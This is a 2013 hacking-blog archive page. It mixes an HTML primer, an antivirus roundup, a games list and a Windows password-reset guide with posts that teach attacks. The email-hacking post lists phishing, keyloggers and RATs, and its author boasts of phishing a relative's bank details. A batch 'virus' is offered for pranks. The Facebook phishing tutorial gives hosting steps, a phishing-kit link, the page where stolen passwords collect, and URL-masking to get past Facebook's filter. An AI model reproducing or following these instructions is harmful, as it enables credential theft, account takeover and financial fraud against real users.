Saturday, February 2, 2013

HTML is necessary for hackers

HTML is necessary for hackers


Hello guys today I am going to talk about basic HTML which is useful for hackers in many purposes. A hacker must have basic knowledge about HTML which makes easy to understand web pages,XSS , phishing etc. When there is a  vulnerability in victim’s website, a hacker must have a little idea about what it is. Hence he must get used to HTML to identify and take control over the website! When I entered in the world of computers,blogging and hacking I was not at all aware of HTML but having a regular touch with web pages and there codes I was able to learn and understand it. HTML is very easy, you just have to be a quick learner to get to know it! So below are few lessons which help you to get a basic notion…
Lesson 1: Introduction to HTML
HTML consists of lot of tags which are used to design a webpage.HTML tags are keywords surrounded by angle brackets like <html>. HTML tags normally come in pairs like <b> and </b>. These tags are like a set of commands. The first tag in a pair is the start tag, the second tag is the end tag. Start and end tags are also called opening tags and closing tags. Every code starts with a simple tag “<html>” and end with “</html>”. The text between <html> and </html> describes the web page
Example:
<html>
<body><h1>My First Heading</h1><p>My first paragraph.</p></body>
</html>
        The text between <body> and </body> is the visible page content. The text between <h1> and </h1> is displayed as a heading. The text between <p> and </p> is displayed as a paragraph.
Lesson 2: Create your own test web page
If you want to create a web page on your own computer, just right click the link, and select “save target as” or “save link as”. Save it with any name wich ends with “.htm” or “.html
mainpage.htm
After you have saved the files, you can open the file which you have saved and see your first web site in action.
Similarly you can create more pages by just writing few simple codes in notepad and saving it as “.htm
TIP: I suggest you experiment with everything you learn here by editing your web files  Notepad.
Lesson 3: HTML basic tags
HTML headings:
<h1>This is a heading</h1>
<h2>This is a heading</h2>
<h3>This is a heading</h3>
HTML links:
<a href=”http://www.vjblog.co.cc”>This is a link</a>
HTML images:
<img src=”http://www.google.co.in/intl/en_ALL/images/logos/images_logo_lg.gif &#8221; width=”104″ height=”142″ />
Empty HTML elements:
HTML elements with no content are called empty elements.
<br> is an empty element without a closing tag, the <br> tag defines a line break.
Lesson 4: HTML reference attributes
Attributes are the worlds used inside a HTML opening tag to adjust the title, class, width and height (if image).
Example: <img src=”http://www.google.co.in&#8221; width=”104″ height=”142″ />
Below is a table which give few tags (Source of the table : W3schools)
Attribute Value Description
class classname Specifies a classname for an element
id id Specifies a unique id for an element
style style_definition Specifies an inline style for an element
title tooltip_text  Specifies extra information about an element (displayed as a tool tip)
dir ltr
rtl
Specifies the text direction for the content in an element
lang language_code               Specifies a language code for the content in an element.
xml:lang language_code Specifies a language code for the content in an element.
onload script                             Script to be run when a document load
onunload script Script to be run when a document unload
onblur script Script to be run when an element loses focus
onchange script Script to be run when an element changes
onfocus script Script to be run when an element gets focus
onreset script Script to be run when a form is reset
onselect script  Script to be run when an element is selected
onsubmit script                              Script to be run when a form is submitted
onclick script Script to be run on a mouse click
ondblclick script Script to be run on a mouse double-click
onmousedown script Script to be run when mouse button is pressed
onmousemove script                              Script to be run when mouse pointer moves
onmouseout script Script to be run when mouse pointer moves out of an element
onmouseover script Script to be run when mouse pointer moves over an element
onmouseup script Script to be run when mouse button is released
Lesson 5: HTML tag list
DTD: indicates in which HTML 4.01 / XHTML 1.0 DTD the tag is allowed. S=Strict, T=Transitional, and F=Frameset
Tag Description DTD
<!–…–> Defines a comment STF
<!DOCTYPE> Defines the document type STF
<a> Defines an anchor STF
<abbr> Defines an abbreviation STF
<acronym> Defines an acronym STF
<address> Defines contact information for the author/owner of a document STF
<applet> Deprecated. Defines an embedded applet TF
<area /> Defines an area inside an image-map STF
<b> Defines bold text STF
<base /> Specifies the base URL/target for all relative URLs in a document STF
<basefont /> Deprecated. Specifies a default color, size, or font for all the text in a document TF
<bdo> Overrides the current text direction STF
<big> Defines big text STF
<blockquote> Defines a long quotation STF
<body> Defines the document’s body STF
<br /> Defines a single line break STF
<button> Defines a clickable button STF
<caption> Defines a table caption STF
<center> Deprecated. Defines centered text TF
<cite> Defines a citation STF
<code> Defines a piece of computer code STF
<col /> Defines attribute values for one or more columns in a table STF
<colgroup> Specifies a group of one or more columns in a table for formatting STF
<dd> Defines a description of an item in a definition list STF
<del> Defines text that has been deleted from a document STF
<dfn> Defines a definition term STF
<dir> Deprecated. Defines a directory list TF
<div> Defines a section in a document STF
<dl> Defines a definition list STF
<dt> Defines a term (an item) in a definition list STF
<em> Defines emphasized text STF
<fieldset> Groups related elements in a form STF
<font> Deprecated. Defines font, color, and size for text TF
<form> Defines an HTML form for user input STF
<frame /> Defines a window (a frame) in a frameset F
<frameset> Defines a set of frames F
<h1> to <h6> Defines HTML headings STF
<head> Defines information about the document STF
<hr /> Defines a horizontal line STF
<html> Defines the root of an HTML document STF
<i> Defines italic text STF
<iframe> Defines an inline frame TF
<img /> Defines an image STF
<input /> Defines an input control STF
<ins> Defines text that has been inserted into a document STF
<kbd> Defines keyboard input STF
<label> Defines a label for an <input> element STF
<legend> Defines a caption for a <fieldset> element STF
<li> Defines a list item STF
<link /> Defines the relationship between a document and an external resource STF
<map> Defines a client-side image-map STF
<menu> Deprecated. Defines a menu list TF
<meta /> Defines metadata about an HTML document STF
<noframes> Defines an alternate content for users that do not support frames TF
<noscript> Defines an alternate content for users that do not support client-side scripts STF
<object> Defines an embedded object STF
<ol> Defines an ordered list STF
<optgroup> Defines a group of related options in a drop-down list STF
<option> Defines an option in a drop-down list STF
<p> Defines a paragraph STF
<param /> Defines a parameter for an object STF
<pre> Defines preformatted text STF
<q> Defines a short quotation STF
<s> Deprecated. Defines strikethrough text TF
<samp> Defines sample output from a computer program STF
<script> Defines a client-side script STF
<select> Defines a drop-down list STF
<small> Defines smaller text STF
<span> Defines a section in a document STF
<strike> Deprecated. Defines strikethrough text TF
<strong> Defines strong text STF
<style> Defines style information for a document STF
<sub> Defines subscripted text STF
<sup> Defines superscripted text STF
<table> Defines a table STF
<tbody> Groups the body content in a table STF
<td> Defines a cell in a table STF
<textarea> Defines a multiline input control (text area) STF
<tfoot> Groups the footer content in a table STF
<th> Defines a header cell in a table STF
<thead> Groups the header content in a table STF
<title> Defines a title for the document STF
<tr> Defines a row in a table STF
<tt> Defines teletype text STF
<u> Deprecated. Defines underlined text TF
<ul> Defines an unordered list STF
<var> Defines a variable STF
<xmp> Deprecated. Defines preformatted text
With reference : W3schools

How Hacker Hack Email IDs

How Hacker Hack Email IDs

Hello guys, today I am going to write about how hackers hack email IDs and spoof into them for personal information of the victim. I will mention all the methods used by hackers which will help you understand the basic idea about it. You might have a doubt about what advantage a hacker can gain  hacking an email id and spoofing in that. A hacker will be able to steal money, hack into a web server, access victim’s bank account etc just by hacking an email id! Surprised? Yes that’s true a hacker can gain access into all of them. If you still don’t believe this then read this…
While practicing with my skills once I hosted a fake page on a public computer which was linked to my email! I constructed the page in such a way that once a victim enters his username, password and hits “log in” he will be redirected to his inbox but his username and password will be sent to my email id. I got a victim in my trap and I entered into his email account then I saw that he was an internet banker and hence his bank account was linked to his email. I simply sent a mail to the bank contact person and i received his personal data related to the bank. This way I was able to access his bank account and also was able to shop online by using his bank info but he was my Maternal uncle so i didn't lead to any problem.

NOTE:- THIS MAY LEAD TO PRISON IF U GOT CAUGHT

So here are the methods used by hackers to hack an email id.
Method 1: Fake mail
This is the basic method employed by laymen to hack an email id. Hackers do not use this method unless the victim is a fool. You just have to send a mail containing false info and ask them to mention their username and password in the reply to get the access into that service which you mentioned in your mail!
This trick is not so efficient therefore hackers don’t prefer this method. You don’t have to be a hacker to perform this type of attack because this is just like a child’s play. This trick works only if you are able to fool the victim properly.
Method 2: Keylogging
This is the best method to hack an email id. You just need a keylogger which will send you every keystroke of the victim. You will have to pass a link containing the keylogger and it automatically gets installed in the victim’s computer. You have to find the best keylogger for employ this type of trick.There are keyloggers which work remotely and available online.
A professional hacker is capable of writing his own keylogger but if you are not one of them then you have to buy a keylogger online. If you have physical access to victims computer then you can upload a keylogger yourself and then later check out the keystrokes.
Method 3: Cookie Stealing
Cookie is a piece of text stored on victim’s computer by websites visited by the user. This stored cookie is used by web server to identify and authenticate the user. So, if you steal this cookie (which is stored in victim browser) and inject this stolen cookie in your browser, you can imitate victim identity to web server and enter his email account easily.
A hacker steals a session of the victim and logs into his email without giving the victim an idea about the stolen cookie. This is called Session Hijacking/ Cookie stealing
Method 4: Phishing
This is the trick I used in hacking the victim’s id which i mentioned above in the example! This is very simple trick, you just have to create a web page of the login form which exactly looks like the email service. Then you have to host it on a public server and send it to victim. When a victim uses that page to login his email and password will be sent to you via email!
To hack an email using phishing you must have a basic knowledge on HTML or there are many online tools which will automatically create a fake page. If you want to be a pro hacker then you must learn HTML and create a page.
Method 5: Remote Administration Tools
This is similar to keylogging! Remote Administration Tools (RAT) is the remote keylogging. Here you do not have physical access to the victim’s computer, but you still install it without alerting the victim about it.A keylogger software will operate in a complete stealth mode and thus remains undetected.
Method 6: Malware/ JavaScript
A hacker writes a simple code which is referred as malware or JavaScript. Once the code is executed on the victim’s computer his credential data is sent to the hacker through the internal ports. A hacker saves the code on a web page which is later sent to the victim, when the victims opens the web page the code automatically executes and his system get vulnerable to the attacks.

I am still learning method 6 ,will upload more info as i get into it :)
So these are the common methods used by a hacker to hack into an email id. In my later articles I will describe each method with an example, so stay updated.

Friday, February 1, 2013

How to make a simple batch file “I Love You” Virus!

How to make a simple batch file “I Love You” Virus!


Hey guys, hope you guys are still listening me… Well today I am here to give you a batch file virus which will display your message continuously even after you close or hit “Okay” it re-appears! Well this one is not of that much of professional use but you can use it for pranking your friends or girlfriends!
This is just a simple batch file, in future I will be talking more on this topic. I will give a complete introduction and basic command list which is useful to write a batch file virus!
Actually virus is a simple program which can cause damage to your systems. Batch file viruses are used by script kiddies to get in action… If it is used efficiently you can really cause a huge damage to the system.So coming to the topic, here it starts…
Here is the code just copy it and paste it in your notepad!
@echo off
:a
msg * I Love You
goto a
Now after pasting it in your notepad click on ‘File’ then ‘Save as’ and give a name with extension ‘.bat
Note: Remember, this trick will work only in windows operating system!
This trick is just an example, you can try to make different viruses with batch file programming. If you don’t have enough knowledge on batch file programming then I will post a tutorial very soon…
Have fun and feel free to comment.

Thursday, January 31, 2013

Introduction to BackTrack

Introduction to BackTrack

Add caption
Hello guys, in this post I will talk about backtracking. This will be just an introductory post for now. So read on…!
BackTrack is an all-in-one tool which is the heart of hackers (Both for Newbies and Professionals). If I had to talk about BackTrack and hacking then I would tell it off in just a single sentence that is ” BackTrack takes out the word impossible from a hackers dictionary!” BackTrack contains all the tools which are required for a hacker. Once you master the backtracking stuff then no one can beat you.
As this an Operating System (OS) I can’t give you a theoretical tutorial but will be giving a visual so I have embedded a video which will be helpful for you to understand how to handle and use BackTrack. This video I have found on YouTube and I am sharing with you guys!
Have a look…




The advance stuff will be posted in my upcoming articles so stay updated by following us…!

Wednesday, January 30, 2013

Top Antivirus of 2013



Top Free Antivirus of 2013



 


free antivirus for windows 7
All of you reading this post would surely know what is an antivirus. Well yes, in simple Anti-virus softwares are like our computer guards. They protect us from virus, Trojans and all other kinds of malware. Most of the guys search for illegal versions of antivirus when they are over with validity time. So today in this post, I am going to discuss the top free antivirus for windows 7 of 2013 for your small business or home computer.

              TOP FREE ANTIVIRUS OF 2013


Avast Free Antivirus

Avast Free Antivirus Top Free Antivirus of 2013
Avast is the most popular free antivirus software for windows. Also it is ranked #1 Download Antivirus Software by Cnet.com. Avast! is a robust antivirus software which provides a lot of free features. It automatically adds WebRep add-on to browsers. However Firefox blocks it and asks for permission.One of the advantage is that you don’t have to reboot your system after installing avast!. The interface is easy to use.
Download Avast 7 free Antivirus




Microsoft Security Essentials (MSE)


Microsoft Security Essentials is wonderful and efficient antivirus program that updates regularly and keeps you safe from all kinds of Trojans and malware. The system tray icon turns green when your computer is threat-free or turns red when you have some problem with your system. Moreover it has a good detection rate and doesn’t require any registration. If you’ve got a genuine copy of your windows then only you can install it. However, the time it takes for scanning is rather slow compared to other antivirus softwares.
 Download Microsoft Security Essentials Free

 AVG Free Antivirus 2013

 AVG Anti Virus Free Edition 2013 Top Free Antivirus of 2013
AVG does the most amongst all the free antivirus. It includes schedule scanner, link scanner, automatic updates, spam scanner etc. It supports Windows 7, Vista and XP. AVG has improved their program from very low detection rates to a better protection over the years. It  takes almost 5 minutes for installation. It too doesn’t require a re-boot. In the AVG toolbar which is included by default now includes a DoNot Track Add-On. The newest is highly improved and provides you with better protection.
Download AVG Free Antivirus 2013

Avira Free Antivirus


avira Top Free Antivirus of 2013
Avira is still one of the top referred free antivirus programs on the internet. It is ranked 3rd highest downloaded antivirus by cnet.com. It has also partnered with DoNotTrack Me  to include it on their toolbar along with Web Site Reputation adviser  The interface is same like the previous one. However it has high false positives but high detection rates. This time Avira has new features and more protective options. Its good that Avira takes less time to install than the above mentioned.
 Download Avira Free Antivirus 2013


Panda Cloud Antivirus


panda cloud antivirus Top Free Antivirus of 2013
Panda Cloud Antivirus is another effective antivirus programs available for free in the market. All the virus definitions are stored in the cloud. Out of all of the above it has the highest detection rates. It includes behavioral blocker and web protection to increase your security to its highest. Its the program I would recommend to all the basic home users. It never slows down your PC because it does everything in the cloud. However by installing the toolbar it sets the default homepage to Yahoo.
 Download Panda Cloud Antivirus

I have provided the top freeware Antivirus programs for 2013. However there are lot of others also which are not the best for me ! I have mentioned some below which you can give a try ! icon smile Top Free Antivirus of 2013 icon biggrin Top Free Antivirus of 2013
  1.  Comodo Antivirus
  2. Immunet Free Antivirus
  3. Emsisoft Anti-Malware
  4. Digital Defender Antivirus
  5. PC tools Antivirus
  6. HitMan Pro
  7. Rising Antivirus
Thanks for reading the post. Now its your turn to choose the best and share this article to your friends on Facebook or Twitter. Also do not forget to Google Plus this post from the left bar.

Sunday, January 27, 2013

Top 5 high definition (HD) graphic PC games of 2012

Top 5 high definition (HD) graphic PC games of 2012

Read about the top 5 PC games of year 2012. Know the games which were the 
hottest pick of this year and were the most preferred games on the top games in
the world. Read what is so special about thee games and why these made it to out
top 5 list

Firefall

Firefall



One among the top 5 Pc games of 2012 is Firefall. Firefall is a creation of Red 5 studios. This game is a shooting based one. This is a great game that lets you play battle between two players or CPU. Firefall features customization of your favorite fighter. And the main feature that this game provides is the great visual themes and many more equipments. Firefall had become the best shooter game of the year with its fantastic gameplay.



Call of Duty Black Ops 2

 

 

 


 
 After the successful feedback of Call of Duty Black Ops, Call of Duty proudly released yet another action thriller game as the next part in Call of Duty series. Call of Duty Black Ops 2 is a first person shooter game which has been marketed by Treyarch. This game is releasing on almost all the gaming platforms like Microsoft Windows, PlayStation 3, Xbox 360 etc. This game is expected to be the best shooter game of 2012.









Hitman Absolution: Hitman 5

 

 



 Hitman Absolution or Hitman 5 is an action thriller game developed by IO Interactive and marketed by Square Enix for major gaming platforms like Xbox, PS3 and PC. Hitman Absolution is the fifth part of the famous Hitman game series. This game is one of the best action pack game for 2012. Hitman Absolution features many important factors which will it unique from other series. This game provides high end graphics and a thrilling storyline. This is a must-have action game for your PC, especially if you are a fan of Hitman games.


Tomb Raider - E3 2012 Exclusive Crossroads

 

 



 Tomb Raider - E3 2012 Exclusive Crossroads is yet another adventure game for your PC. As Tomb Raider is a successful game series, Tomb Raider which is about to release is the ninth part of this game series. This game is completely filled with action and adventure to entertain you throughout the storyline. This game launches with completely stunning graphics and visuals compared to its previous version. Tomb Raider is developed by Crystal Dynamics and published by Square Enix. If you have played any previous versions of Tomb Raider, then you will know that this game will not keep you bored.

 

The Darkness 2

 

 


 Darkness 2 is another latest game from the series of the ever time famous action packed game 'The Darkness'. This game is being developed by Digital Extremes. It`s previous version was on market in 2007 and after 5 years they are releasing its sequel part II, so we can expect a maximum features in it. The Darkness 2 is being developed by 2k games exclusively for all gaming platforms. But its previous sequel was not released for PC, so this game will be the first ever game from Darkness series to be released for PC.



share if u liked and show ur love  

Saturday, January 26, 2013

How To Hack Windows 8 Password

How To Hack Windows 8 Password

 


In Windows 8, you can log in to the system using traditional text password, picture password, four-digit PIN or Windows Live ID. What to do if you forgot one of the login password? How to hack Windows 8 password without losing the files on your computer?
If you are a heavy Windows 8 users, you’ll discover that you can always click on Sign-in options to choose to log in using traditional text password or Windows Live ID, if you forgot picture password or four-digit PIN. So if there is a software which can hack both local account password and Windows Live ID, you can regain access to your system no matter what types of password you’ve forgotten.
Luckily there is a software called Reset Windows Password utility which can do this perfectly. The software comes as an ISO image file. Just burn the ISO image to a CD, put the CD into your CD-ROM drive and reboot the computer. The system will load a complete mini operating system which contains a password hacking tool, it enables you to reset your forgotten local account and Windows Live account password easily.
How to Hack Windows 8 Password?
  1. Click here to download the Reset Windows Password software. Once the download is complete, unzip the download file and you’ll find the CD ISO image: ResetWindowsPwd.iso.
  2. Burn the ISO image to an empty CD using any CD/DVD recording software such as BurnCDCC or ISO2Disc.
  3. Place the Live CD you’ve created in the CD drive of your Windows 8 computer. Head into the BIOS and set the computer to boot from CD.
  4. The boot procedure may take one or two minutes, and the Reset Windows Password program will start.        

  1. From the main window of Reset Windows Password program, you could see the Windows SAM registry file and user accounts inside the SAM file.
  2. Choose the user account whose password you forgot, and then click on the Reset Password button. It will reset the forgotten Windows 8 password immediately.
Restart the computer and remove the password hacking CD, you can then log in to Windows 8 with a new password. After logging in using the traditional text password or Windows Live ID, you can reset your picture password and four-digit PIN easily.

Join US more hAcks!!! 

Friday, January 25, 2013

MAKING FACEBOOK PHISHING SITE


MAKING FACEBOOK PHISHING SITE TUTORIAL




 In my previous article I taught you people how to make a Phishing site. ( The articles is here ). Now in this article i am going to teach you how to set up the Phishing site, which is the Difficult task than making a Phishing site.

Step 1: The First Step in Making the site is to regester an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)



Step 2: Now Goto your email account that you gave and confirm your account with confirmation link

Step 3: Now Download this FILE (http://www.mediafire.com/?klq1vak76bouzrw ) .


Step 4: Now Goto http://members.000webhost.com/ and Log into your account.




Step 5: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.



Step 6: Now Click on the Public_html.




Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.



Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected. 


NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:

http://www.yoursitesadress.p4o.net/lol.html

If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO facebook.zip is http://adf.ly/73Q4s
PS:> If www.p4o.net didn't worked for you, you can use :
www.drivehq.com
www.yourfreehosting.net
www.esmartstart.com

The Input Data (Email and Password) will look like following:

==============================================================
UPDATE:
Now if you have successfully made the Phishing page(site) then you must know that on Facebook you cannot post it, mail it, or sent it in chat. e.g: www.yoursite.p4o.net. This is because Facebook dont allow the T35.com sites. So Solution to this problem is to use http://www.dot.tk for the URL hiding.
All you have to do is to Goto http://www.dot.tk , on the main page enter your Phishers address and get a domain for that. Like for www.myphisher.p4o.net you gets www.myphisher.tk. And facebook will allow you to post it

HOW TO FIND YOUR USERNAME?
Ok guys this is the most asked question of all so here is a simple answer, just look in the following picture of Admin Paned the red shaded area tells you the username of the website



©2012, Copyright Shailabh Singh.Please do not copy the articles of GeekyShailabh without taking permission.